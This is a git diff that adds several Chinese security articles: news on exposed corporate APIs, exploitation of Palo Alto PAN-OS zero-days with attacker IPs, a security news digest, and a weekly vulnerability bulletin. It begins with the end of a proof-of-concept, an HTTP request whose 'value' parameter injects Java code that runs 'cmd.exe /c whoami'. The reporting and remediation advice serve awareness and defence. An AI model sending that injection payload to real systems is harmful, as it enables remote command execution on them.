HTTP/1.1 +Host: +User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length:322 + +operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field + +``` + + +neclei批量检测截图 + +![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohndtSd4x25ttSzbFiaDEwic4pd3ic0pJibLiaQF53ejXnDcWxIXRQ1MwW5Hh5ibIDRfwd4Xeeeo08XLNILvQ/640?wx_fmt=png&from=appmsg "") + + +04 + +— + +修复建议 + + +1、输入验证:对所有用户输入进行严格的验证,确保只接受预期的格式。2、使用安全的API:使用安全的库或API来执行命令,避免直接调用系统命令。3、最小权限原则:确保应用程序仅在必要的权限下运行,限制可执行的命令。4、输出编码:对输出进行编码,以防止注入攻击。 + +05 + +— + +下载地址 + + +进入公众号点击POC可获取所有POC文件 + +![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohneS7aOPfDNKhvOicibVlyrkJ3A4EuUx5c5S8eAxFnF9KiaibAGJfP6ibB6ze4Rm4pZ7MI4jQibT05lTevqg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + + + + + diff --git a/doc/致命漏洞与暴露API:财富1000强企业面临的30000个暴露API和10万漏洞挑战.md b/doc/致命漏洞与暴露API:财富1000强企业面临的30000个暴露API和10万漏洞挑战.md new file mode 100644 index 00000000..c9d248d4 --- /dev/null +++ b/doc/致命漏洞与暴露API:财富1000强企业面临的30000个暴露API和10万漏洞挑战.md @@ -0,0 +1,125 @@ +# 致命漏洞与暴露API:财富1000强企业面临的30000个暴露API和10万漏洞挑战 + 安全客 2024-11-25 07:01 + +近日,Escape团队发布《API暴露现状报告2024》,揭示了全球超大型企业组织在API安全方面存在的重大漏洞。 +**报告覆盖了财富1000强和CAC 40公司的API安全状况,特别指出了这些企业在API管理和防护上的显著缺陷。尤其是在金融、医疗、保险等行业,存在广泛的安全隐患。** + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/Ok4fxxCpBb6pUic4ib3Iq3fywX5JicdsUYNvI64tPt39JAVU1Pjz7BUXbibtNz5ebgDzxDTLYxFhsd7ZRPP08uL6Xg/640?wx_fmt=jpeg&from=appmsg "") + + +**01** + +**暴露API与漏洞的惊人数量** + + +Escape团队分析了财富1000强和CAC 40公司域名, +**发现了30,784个暴露的API,并识别出超过100,000个API漏洞,其中1,834个被评为高度严重。**这些漏洞主要与身份验证失败和配置错误相关。Escape公司首席执行官Tristan Kalos指出:“API安全的规模化已成为企业面临的根本性挑战。随着API的广泛应用,企业的安全措施往往滞后,导致大量敏感数据暴露。” + + +其中, +**暴露的API还包括3,945个开发API**,这些API通常没有采取足够的安全防护措施。作为开发过程中的一部分,这些API往往承担着测试、调试等重要职能,但却常常暴露在公共互联网上,成为攻击者的入口。报告指出, +**六家企业暴露了超过100个开发API,其中五家来自财富1000强公司。** + + +**02** + +**暴露的敏感数据和高风险漏洞** + + +除了暴露的API数量令人担忧外,报告还揭示了另一个重要问题——敏感数据的泄露。调查发现, +**共有1,816个敏感信息(如API密钥、身份验证令牌和数据库凭证)被暴露。这些数据如果被攻击者利用,将直接威胁企业的核心系统安全。** + + +报告还对漏洞类型进行了详细分析,重点关注了以下几种严重安全风险: + + +**身份验证失败(Broken Authentication):**API2:2023漏洞是最常见的身份验证漏洞,报告中记录了381个实例。攻击者利用这些漏洞可以绕过身份验证机制,获取未授权的访问权限。 + + +**安全配置错误(Security Misconfigurations):**报告还发现746个API存在配置错误实例,这类问题通常是由于缺乏适当的访问控制、暴露了关键端点或错误配置了API权限,导致企业的敏感数据和系统暴露在外。 + + +这些漏洞与一些高风险的CVE(公共漏洞和暴露)相关,例如CVE-2024-5535和CVE-2021-3711,显示了企业在解决已知漏洞方面的长久困扰。 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/Ok4fxxCpBb6pUic4ib3Iq3fywX5JicdsUYNuKPQgF5n3ia38lBQABmXeibvD4sic3Wo1zc5dQ11fXGCcoVrDdUB29xRw/640?wx_fmt=jpeg&from=appmsg "") + + +**03** + +**实际案例加剧了紧迫性** + + +报告中的几个真实案例突显了API暴露带来的重大风险,进一步验证了加强API安全的迫切性。以下是一些近年来发生的典型安全事件: + + +**Trello:**2024年1月,由于API配置错误,Trello暴露了超过1500万个用户记录。攻击者可能利用这一漏洞获取用户信息,并进行后续攻击。 + + +**Dell:**2024年5月,Dell因一个未加固的API端点导致4900万客户记录被泄露。泄露的内容包括个人信息、订单记录等敏感数据,给企业和用户带来了巨大的风险。 + + +**Twilio的Authy服务:**Twilio的Authy服务在2024年发现一个API漏洞,攻击者通过该漏洞访问了认证数据,影响了数百万用户的安全。 + + +**04** + +**应对API安全挑战的关键举措** + + +为了应对API安全风险,报告提出了若干应对措施,旨在帮助企业减少API暴露和漏洞带来的潜在威胁: + + +**全面审计API:**企业应对所有API进行全面审计,特别是影子API和遗留API,确保每个API端点都已记录在案并受到监控。 + + +**增强开发API的安全性:**开发API的安全性往往被忽视,但它们承载着大量敏感数据,因此应当实施与生产环境API同等的安全措施,包括身份验证、权限控制和数据加密等。 + + +**引入API发现工具:**企业应采用自动化API发现和监控工具,持续扫描API环境中的潜在漏洞和配置错误,确保及时发现并修复问题。 + + +**加强安全培训:**许多API安全问题源于开发和运维人员的疏忽或不当配置。企业应定期对员工进行API安全培训,确保他们了解最佳的安全实践,从而在开发阶段就避免常见的安全漏洞。 + + +**合作与信息共享:**特别是在金融、医疗等高风险行业,企业应加强与行业内其他组织的安全合作与信息共享。通过共享API安全的最佳实践和威胁情报,共同提高防护能力。 + + +《API暴露现状报告2024》清晰地传递了一个信号:随着API的广泛应用和数字化转型的加速,API暴露的安全风险正在急剧上升。 +**企业不能再依赖传统的反应性安全措施,而应转向更为主动的策略,利用自动化工具、AI技术和实时监控手段,确保API在整个生命周期内的安全性。** + + +企业领导者和IT安全团队必须意识到,API是数字化生态系统中的核心组成部分,其安全性直接关系到企业的整体安全和品牌声誉。只有通过全面的API安全管理和持续的防护措施,企业才能有效应对不断演化的威胁,保护客户和企业免受数据泄露和系统入侵的威胁。 + + +API安全的挑战不仅仅是技术问题,更是企业数字化转型过程中的战略问题。对于财富1000强企业来说,加强API安全已不容忽视,它是保障业务连续性、维护客户信任和提升企业竞争力的关键所在。 + + +文章参考: + +https://securityonline.info/fortune-1000s-hidden-threat-30000-exposed-apis-and-100000-api-vulnerabilities-unveiled/ + + +**推荐阅读** + + + + + +

01

银狐的反击—模拟点击放行拦截弹窗

02

再谈银狐:百变木马银魂不散

03

银狐木马阴云迭起

+ + +**安全KER** + + +安全KER致力于搭建国内安全人才学习、工具、淘金、资讯一体化开放平台,推动数字安全社区文化的普及推广与人才生态的链接融合。目前,安全KER已整合全国数千位白帽资源,联合南京、北京、广州、深圳、长沙、上海、郑州等十余座城市,与ISC、XCon、看雪SDC、Hacking Group等数个中大型品牌达成合作。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/Ok4fxxCpBb6pUic4ib3Iq3fywX5JicdsUYNZcU6BLgvNMYSesTaNfwMmowtf30gjbYsemKnZ0w1zLOgXR3M7QZicEw/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/Ok4fxxCpBb6pUic4ib3Iq3fywX5JicdsUYNl9zIo5cutP0mGZmZc4BW1qeYlVHJ0UB5omt2eW2BA1NouoQZk37IeA/640?wx_fmt=png&from=appmsg "") + +**注册安全KER社区** + +**链接最新“圈子”动态** + diff --git a/doc/超过2000台Palo Alto Networks防火墙遭到黑客攻击,攻击者利用了最近才修补的零日漏洞.md b/doc/超过2000台Palo Alto Networks防火墙遭到黑客攻击,攻击者利用了最近才修补的零日漏洞.md new file mode 100644 index 00000000..d2be94af --- /dev/null +++ b/doc/超过2000台Palo Alto Networks防火墙遭到黑客攻击,攻击者利用了最近才修补的零日漏洞.md @@ -0,0 +1,25 @@ +# 超过2000台Palo Alto Networks防火墙遭到黑客攻击,攻击者利用了最近才修补的零日漏洞 +鹏鹏同学 黑猫安全 2024-11-25 03:36 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/8dBEfDPEceibDhJC77BUpvs03VRK19llfNuWYmwpicibKVUNveDicfHRn7dswONGV9ULJHLCrGQ3SpHibcMyX7htpOw/640?wx_fmt=png&from=appmsg "") + +数千台Palo Alto Networks防火墙据报遭到黑客攻击,攻击者利用了最近才修补的零日漏洞(CVE-2024-0012和CVE-2024-9474)在PAN-OS中。 + +CVE-2024-0012是Palo Alto Networks PAN-OS中的漏洞,允许未经身份验证的攻击者拥有网络访问权来绕过身份验证并获取管理员权限。这项访问权限使管理员可以执行管理操作、更改配置或利用其他漏洞,如CVE-2024-9474。 + +该问题影响PAN-OS版本10.2、11.0、11.1和11.2,但不影响Cloud NGFW或Prisma Access。CVE-2024-9474是Palo Alto Networks PAN-OS软件中的特权提升漏洞,允许具有管理web界面访问权限的PAN-OS管理员执行以root身份执行的操作。这周,美国国家网络安全局(CISA)将这两个漏洞添加到其已知漏洞目录(KEV)。 + +在11月中旬,Palo Alto Networks确认观察到某些有限的防火墙管理界面受到未经身份验证的远程命令执行漏洞的攻击。Palo Alto说,这个零日漏洞已经被用来在受感染设备上部署web壳,从而授予持久的远程访问权限。 “Palo Alto Networks和Unit 42正在跟踪与CVE-2024-0012和CVE-2024-9474相关的有限的利用活动,并与外部研究人员、合作伙伴和客户合作,分享信息透明和快速。” Palo Alto发布的报告中读到。 + +该报告最初观察到来自以下IP地址的恶意活动: +- 136.144.17.* + +- 173.239.218.251 + +- 216.73.162.* + +该特别警告指出,这些IP地址可能与VPN服务相关,因此也可能与-legitimate user activity相关。 “Palo Alto Networks继续跟踪随着第三方研究人员于2024年11月19日开始公开技术见解和艺术ifacts的公开活动的威胁活动。目前,Unit 42根据moderate to high confidence评估认为,功能 exploit chaining CVE-2024-0012和CVE-2024-9474现在是公开可用的,这将使广泛的威胁活动变得可能。” + +报告继续说。 “Unit 42还观察到两个手动和自动扫描活动 aligning with the timeline of third-party artifacts becoming widely available.” 该调查仍在进行中,Palo Alto Networks更新了Indicators of Compromise的列表。Shadowserver研究员追踪了受感染的Palo Alto Networks防火墙数量,报告约有2000台防火墙被黑客攻击,这些攻击是CVE-2024-0012/CVE-2024-9474活动的一部分。受感染的设备大多数来自美国(554)和印度(461)。 + + diff --git a/doc/违反《网络安全法》相关规定,快手被依法处罚;警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 | 牛览.md b/doc/违反《网络安全法》相关规定,快手被依法处罚;警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 | 牛览.md new file mode 100644 index 00000000..13ebdea0 --- /dev/null +++ b/doc/违反《网络安全法》相关规定,快手被依法处罚;警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 | 牛览.md @@ -0,0 +1,234 @@ +# 违反《网络安全法》相关规定,快手被依法处罚;警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 | 牛览 + 安全牛 2024-11-25 06:30 + +点击蓝字·关注我们  +/  +aqniu + +![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkBjwIRcuxcIx3fvDBydiaqkxw4o55dLPMJBKVsRbYl7ULkJDmFtatY9fWSIcZttiaeQm76cm0TXSBCA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**新闻速览** + + + +•四部门联合开展“清朗·网络平台算法典型问题治理”专项行动 + +•违反《网络安全法》相关规定,快手被依法处罚 + +•远程链式WiFi攻击手法曝光,传统物理接近已非必需 + +•APT组织Gelsemium战术升级,首次部署Linux恶意软件开展攻击活动 + +•军人社交平台服务器配置失误,百万用户隐私数据或遭泄露 + +•警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 + +•Kubernetes官方披露远程代码执行漏洞,可突破容器边界执行任意命令 + +•封禁超240个域名,最大钓鱼即服务平台ONNX遭微软封杀 + +•云安全独角兽Wiz拟4.5亿美元收购Dazz,强化云安全修复能力 + +  + + +**特别关注** + + + +**四部门联合开展“清朗·网络平台算法典型问题治理”专项行动** + + +为进一步深化互联网信息服务算法综合治理,中央网信办、工业和信息化部、公安部、国家市场监督管理总局决定自即日起至2025年2月14日,联合开展“清朗·网络平台算法典型问题治理”专项行动。行动主要任务包括: + +1. 深入整治“信息茧房”、诱导沉迷问题。构建“信息茧房”防范机制,提升推送内容多样性丰富性。严禁推送高度同质化内容诱导用户沉迷。不得强制要求用户选择兴趣标签,不得将违法和不良信息记入用户标签并据以推送信息,不得超范围收集用户个人信息用于内容推送。规范设置“不感兴趣”等负反馈功能。 + + +1. 提升榜单透明度打击操纵榜单行为。全面公示热搜榜单算法原理,提升榜单透明度和可解释性。完善榜单日志留存,提高榜单算法原理可验证性。健全水军刷榜、水军账号等违规行为、账号检测识别技术手段,严管不法分子恶意利用榜单排序规则操纵榜单、炒作热点行为。 + + +1. 防范盲目追求利益侵害新就业形态劳动者权益。严防一味压缩配送时间导致配送超时率、交通违章率、事故发生率上升等问题。详细公示时间预估、费用计算、路线规划等算法规则。搭建畅通的申诉渠道,及时受理劳动者因交通管制、交通事故、恶劣天气等不可控因素导致的配送超时等申诉。 + + +1. 严禁利用算法实施大数据“杀熟”。严禁利用用户年龄、职业、消费水平等特征,对相同商品实施差异化定价行为。提升优惠促销透明度,清晰说明优惠券的领取条件、发放数量和使用规则等内容。客观如实说明优惠券领取失败原因,严禁以“来晚了”“擦肩而过”等提示词掩盖真实原因。 + + +1. 增强算法向上向善服务保护网民合法权益。持续优化完善面向未成年人、老年人的算法推荐服务,便利未成年人、老年人获取有益身心健康的信息。建立健全算法在赋能优质内容传播、违法行为识别发现等方面的社会治理应用。持续提升生成合成信息检测识别能力,及时发现处理违法违规生成合成信息。 + + +1. 落实算法安全主体责任。健全算法机制机理审核、数据安全的管理制度和技术措施。确保算法的训练数据具有合法来源,及时检测修复代码安全漏洞和算法逻辑缺陷,定期对算法模型的可用性、可控性、可解释性以及数据处理、模型训练、部署运行等环节开展安全评估。 + + +原文链接: + +https://mp.weixin.qq.com/s/JTQxUDz9snae3gefR61kcQ + + +**违反《网络安全法》相关规定,快手被依法处罚** + + +据“国家网络安全通报中心”微信公众号22日消息,近日,针对快手公司短视频中存在违法信息等问题,公安机关依据《网络安全法》规定,依法给予快手公司警告处罚。经查,快手公司存在对法律、行政法规禁止发布或者传输的信息未及时处置,以及落实青少年模式不到位等情况,导致违法信息扩散,危害未成年人身心健康,违反了《网络安全法》相关规定。公安机关依法对快手公司给予行政处罚,责令其全面落实青少年模式,全面排查清理违法信息,并依法依规处置违法违规账号。 + + +公安机关要求,各互联网平台须引以为鉴,举一反三,切实履行信息网络安全管理主体责任,严格落实网络实名制,加强源头治理、综合治理,有效防止违法信息传播,坚决防范违法信息对未成年人造成侵蚀危害。 + + +原文链接: + +https://mp.weixin.qq.com/s/tp323lUloSv2j0aBS1qdIg + +  + + +**网络攻击** + + + +**远程链式WiFi攻击手法曝光,传统物理接近已非必需** + + +网络安全公司Volexity最新披露,APT28黑客组织(又称Fancy Bear)在2022年对华盛顿特区的一个目标机构实施了一种被称为“最近邻攻击”的创新攻击模式,标志着WiFi入侵技术达到了新的高度。 + + +与传统的WiFi攻击需要黑客携带设备在目标建筑物附近实施不同,APT28实现了远程WiFi入侵。他们首先入侵了目标大楼对面建筑中的一台笔记本电脑,随后利用该设备的无线网卡作为跳板,成功突破了街对面目标机构的WiFi网络。调查显示,黑客不仅实现了跨街区的WiFi入侵,还可能通过同一建筑内的其他网络实施了“链式入侵”。APT28利用获取的WiFi凭据和Windows打印后台程序漏洞,成功获取了目标系统的管理权限。 + + +前Mandiant威胁情报主管John Hultquist评论说,这种远程WiFi入侵方法是APT28“近距离接入”黑客技术的自然演进,预计未来类似攻击会更加普遍。这一事件也凸显了高价值目标WiFi安全防护升级的紧迫性。 + + +原文链接: + +https://www.wired.com/story/russia-gru-apt28-wifi-daisy-chain-breach/ + +  + +**APT组织Gelsemium战术升级,首次部署Linux恶意软件开展攻击活动** + + +ESET研究人员近期发现了一款名为WolfsBane的Linux后门程序,该程序被归属于高级持续性威胁(APT)组织Gelsemium。这是该组织首次被公开报道使用Linux恶意软件,标志着其作战策略的重大转变。 + + +作为一款网络间谍工具,WolfsBane主要用于窃取系统信息、用户凭证,以及特定文件和目录等敏感数据。该恶意软件具备持久化访问能力,可以隐蔽地执行命令,在实现长期情报收集的同时有效规避检测。其核心特性包括定制的网络通信库、复杂的命令执行机制,以及与其Windows版本相似的配置结构,同时还使用了此前已知的Gelsemium关联域名。 + + +研究人员发现,WolfsBane的攻击链包含三个阶段:首先,投递程序伪装成合法的命令调度工具,将启动器和后门程序放置在隐藏目录中;其次,利用启动器维持持久性并启动后门;最后,后门程序加载嵌入式库以实现主要功能和网络通信。值得注意的是,WolfsBane使用了经过修改的开源BEURK用户空间rootkit来隐藏其活动,通过钩取基本标准C库函数来过滤与恶意软件相关的结果。 + +  + +原文链接: + +https://cybersecuritynews.com/gelsemium-apt-hackers-attacking-linux-servers/ + + +**军人社交平台服务器配置失误,百万用户隐私数据或遭泄露** + + +据Hackread报道,近日美英军人社交和约会服务平台Forces Penpals因服务器配置错误,导致超过110万用户的个人信息遭到泄露。安全研究人员Jeremy Fowler通过vpnMentor发布的报告详细披露了此次事件。 + + +此次暴露的非加密数据库中包含了军人及其支持者的敏感信息,涉及全名、图片、邮寄地址、位置信息、社会安全号码(SSN)和国民保险号码(NIN)等个人数据。更为严重的是,现役军人的军衍、服役证明和军种信息也在泄露之列。 + + +Jeremy Fowler在报告中指出:“在有限的样本调查中,我看到的文件主要是用户图片,此外还包括一些潜在敏感的服役证明文件。”虽然Forces Penpals表示这次数据泄露是由代码错误导致,且问题已得到解决,但关于数据库遭受未经授权访问的具体情况,以及公开暴露的持续时间等细节仍不明确。考虑到涉及军人的敏感身份信息,这次数据泄露事件的安全影响值得高度关注。 + + +原文链接: + +https://www.scworld.com/brief/misconfigured-forces-penpals-server-leaks-over-1-1m-users-data + + + +**漏洞预警** + + + +**警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷** + + +Shadowserver Foundation最新扫描数据显示,攻击者利用最近修复的两个零日漏洞(CVE-2024-0012和CVE-2024-9474),已经成功入侵了约2000台Palo Alto Networks防火墙设备,受影响设备主要分布在美国和印度。 + + +Palo Alto Networks在两周前首次发出警告,称发现攻击者正在利用一个零日漏洞对设备实施远程代码执行攻击。该公司于11月18日进一步确认了两个零日漏洞的存在:CVE-2024-0012允许未经身份验证访问管理界面,而CVE-2024-9474则使攻击者能够将权限提升至root级别。攻击者利用这些漏洞在受感染设备上植入了webshell。 + + +WatchTowr研究团队随后发布了这两个漏洞协同利用的技术分析,并提供了Nuclei模板供管理员检测设备是否受到影响。然而,攻击活动仍在持续。Palo Alto Networks的Unit 42安全团队评估认为,链式利用这两个漏洞的功能性攻击代码已公开,可能导致更广泛的威胁活动。该团队还观察到与第三方攻击工具广泛传播时间线相符的手动和自动化扫描活动。 + + +值得注意的是,这两个漏洞不仅影响防火墙设备,还波及到Palo Alto Networks的Panorama(防火墙管理)设备和用于可疑文件分析的WildFire沙箱系统。Palo Alto 公司表示,正在积极调查这些漏洞的影响范围,并与客户密切合作提供缓解支持。 + + +原文链接: + +https://www.helpnetsecurity.com/2024/11/21/palo-alto-firewalls-compromised-cve-2024-0012-cve-2024-9474/ + + +**Kubernetes官方披露远程代码执行漏洞,可突破容器边界执行任意命令** + + +近日,Kubernetes社区披露了一个高危安全漏洞(CVE-2024-10220),该漏洞允许攻击者突破容器边界执行任意命令。 + + +据Kubernetes安全响应委员会分析,该漏洞存在于多个Kubernetes版本中,包括kubelet v1.30.0至v1.30.2、v1.29.0至v1.29.6,以及v1.28.11及更早版本。攻击者可能通过利用目标仓库中的hooks文件夹,在容器边界之外执行任意命令。具有创建Pod和关联gitRepo卷权限的攻击者可能会利用此漏洞执行恶意命令,从而危及受影响Kubernetes集群的安全。 + + +为应对这一安全威胁,Kubernetes已发布了修复版本,包括kubelet v1.31.0、v1.30.3、v1.29.7和v1.28.12。安全专家建议使用init容器执行Git克隆操作,然后将目录挂载到Pod的容器中,从而有效规避该漏洞带来的风险。 + + +原文链接: + +https://cybersecuritynews.com/critical-kubernetes-vulnerability/ + +  + + +**产业动态** + + + +**封禁超240个域名,最大钓鱼即服务平台ONNX遭微软封杀** + + +微软近日采取法律行动,查封了属于钓鱼即服务(Phishing-as-a-Service)平台ONNX的240个域名。该平台自2017年以来一直为犯罪分子提供服务。微软《2024数字防御报告》显示,ONNX是最大的中间人钓鱼服务提供商,仅2024年上半年就发起了数百万次针对Microsoft 365账户的钓鱼邮件攻击。 + + +ONNX通过Telegram销售钓鱼工具包,采用订阅服务模式,月费从150美元到550美元不等。该平台提供的钓鱼工具包专门针对多家科技行业公司,其中包括Google、Dropbox、Rackspace和Microsoft等。ONNX的攻击通过Telegram机器人进行控制,并内置双因素认证(2FA)绕过机制。最近,该平台还启用了针对金融机构员工的二维码钓鱼攻击(又称quishing)。ONNX利用防弹托管服务来延迟钓鱼域名的下线时间,同时使用自解密的加密JavaScript代码,这些特性使其能够有效实施攻击并逃避检测。 + + +微软数字犯罪部门助理总法律顾问Steven Masada表示,这次行动向那些试图复制微软服务并在网上危害用户的人发出了强烈信号:微软将积极采取补救措施保护其服务和客户,并不断改进技术和法律策略。 + + +原文链接: + +https://www.darkreading.com/cybersecurity-operations/microsoft-takes-action-against-phishing-service-platform + + +**云安全独角兽Wiz拟4.5亿美元收购Dazz,强化云安全修复能力** + + +云安全领域独角兽企业Wiz日前宣布,计划以4.5亿美元收购专注于云环境修复的初创公司Dazz,旨在通过整合Dazz的“行业领先的修复引擎”来扩展其云计算和AI安全平台能力。 + + +Dazz提供专注于修复的云安全平台,具备应用安全态势管理和持续威胁与暴露管理等功能。自2021年成立以来,Dazz已累计获得1.1亿美元融资,其中包括今年7月完成的5000万美元融资轮。Wiz联合创始人兼首席执行官Assaf Rappaport表示,此次收购将使Wiz能够“赋能安全团队在统一平台上关联多源数据并管理应用风险”。这是Wiz在2024年的第二次收购,此前该公司已于4月份收购了云检测和响应提供商Gem Security。 + + +作为一家成立仅四年的公司,Wiz发展迅猛。今年5月,该公司以120亿美元估值完成10亿美元新一轮融资。据报道,其年度经常性收入(ARR)已从今年早些时候的3.5亿美元增长至超过5亿美元。 + + +原文链接: + +https://www.crn.com/news/security/2024/wiz-to-acquire-cloud-remediation-startup-dazz-for-450-million + + + +![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMnicXSRCtG4URyLibbqPegjnnibfRB0z4zIzwghbLOkV5fqGYM8vhuQdqw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +合作电话:18311333376 + +合作微信:aqniu001 + +投稿邮箱:editor@aqniu.com + +![](https://mmbiz.qpic.cn/mmbiz_gif/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMAGiauAWicdDiaVl8fUJYtSgichibSzDUJvsic9HUfC38aPH9ia3sopypYW8ew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + + + diff --git a/doc/雷神众测漏洞周报2024.11.18-2024.11.24.md b/doc/雷神众测漏洞周报2024.11.18-2024.11.24.md new file mode 100644 index 00000000..6c2c4285 --- /dev/null +++ b/doc/雷神众测漏洞周报2024.11.18-2024.11.24.md @@ -0,0 +1,194 @@ +# 雷神众测漏洞周报2024.11.18-2024.11.24 +原创 雷神众测 雷神众测 2024-11-25 07:00 + +摘要 + + +以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。 + + +目录 + +**1.Palo Alto Networks PAN-OS存在身份验证绕过漏洞** + +**2.Microsoft Excel远程代码执行漏洞** + +**3.致远OA存在命令执行漏洞** + +**4.Microsoft Windows Hyper-V Shared Virtual Disk权限提升漏洞** + + + +漏洞详情 + +**1.Palo Alto Networks PAN-OS存在身份验证绕过漏洞** + + +漏洞介绍: + +PAN-OS 是运行Palo Alto Networks 下一代防火墙的软件。 + + +漏洞危害: + +Palo Alto Networks PAN-OS Web管理界面存在身份验证绕过漏洞(CVE-2024-0012),未经身份验证的攻击者通过网络访问管理Web界面,从而获取PAN-OS管理员权限以执行管理操作、篡改配置或利用其他经过身份验证的特权提升漏洞(如CVE-2024-9474)。 + + +漏洞编号: + +CVE-2024-0012 + + +影响范围: + +PAN-OS 11.2 < 11.2.4-h1 + +PAN-OS 11.1 < 11.1.5-h1 + +PAN-OS 11.0 < 11.0.6-h1 + +PAN-OS 10.2 < 10.2.12-h2 + + +修复方案: + +及时测试并升级到最新版本或升级版本 + + +来源:安恒信息CERT + +**2.Microsoft Excel远程代码执行漏洞** + +漏洞介绍: + +Microsoft Excel是美国微软(Microsoft)公司的一款Office套件中的电子表格处理软件。 + + +漏洞危害: + +Microsoft Excel存在远程代码执行漏洞,攻击者可利用该漏洞在系统上执行任意代码。 + + +漏洞编号: + +CVE-2024-49029 + + +影响范围: + +Microsoft Office 2019 + +Microsoft 365 Apps for Enterprise + +Microsoft Office LTSC 2021 + +Microsoft Office LTSC for Mac 2021 + +Microsoft Microsoft Office LTSC 2024 + +Microsoft Office LTSC for Mac 2024 + +Microsoft Excel 2016 (64-bit edition) + +Microsoft Excel 2016 (32-bit edition) + + +修复方案: + +及时测试并升级到最新版本或升级版本 + + +来源:CNVD + + +**3.致远OA存在命令执行漏洞** + + +漏洞介绍: + +致远OA是一款协同管理软件,是面向中型、大型集团型组织的数字化协同运营平台。 + + +漏洞危害: + +致远OA存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 + + +影响范围: + +北京致远互联软件股份有限公司 致远OA A8 SP2 + +北京致远互联软件股份有限公司 致远OA G6 + + +修复方案: + +及时测试并升级到最新版本或升级版本 + + +来源:CNVD + +**4.****Microsoft Windows Hyper-V Shared Virtual Disk权限提升漏洞** + +**** +漏洞介绍: + +Microsoft Windows Hyper-V是微软开发的一种虚拟化技术,主要用于在Windows操作系统上创建和管理虚拟机,Shared Virtual Disk是其中的共享虚拟磁盘。 + + +漏洞危害: + +Microsoft Windows Hyper-V Shared Virtual Disk存在权限提升漏洞,该漏洞是由Hyper-V共享虚拟磁盘中的缺陷引起的。攻击者可利用此漏洞在系统上获得更高的权限。 + + +漏洞编号: + +CVE-2024-43624 + + +影响范围: + +Microsoft Windows Server 2019 + +Microsoft Windows Server 2022 + +Microsoft Window 10 22H2 + +Microsoft Window 10 21H2 + +Microsoft Window 11 22H2 + +Microsoft Window 10 1809 + +Microsoft Window 11 23H2 + +Microsoft Window 11 24H2 + +Microsoft Windows Server 2025 + + +修复方案: + +及时测试并升级到最新版本或升级版本 + + +来源:CNVD + + + + + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/HxO8NorP4JXTuqP6YvkvOsCmLhJPTwstibBNpge74c9Hlndy94G8PDQKguT7qwxBqlaIAYyPibExQeRv9ZSOgvpg/640?wx_fmt=jpeg&from=appmsg "") + +专注渗透测试技术 + +全球最新网络攻击技术 + + +**END** + +![](https://mmbiz.qpic.cn/mmbiz_jpg/HxO8NorP4JXTuqP6YvkvOsCmLhJPTwst8JPScjFZlXicayUCbaMjlyB8muUQNscBaYWEKNiaYF1oeWSQrx9arPDA/640?wx_fmt=jpeg&from=appmsg "") + + +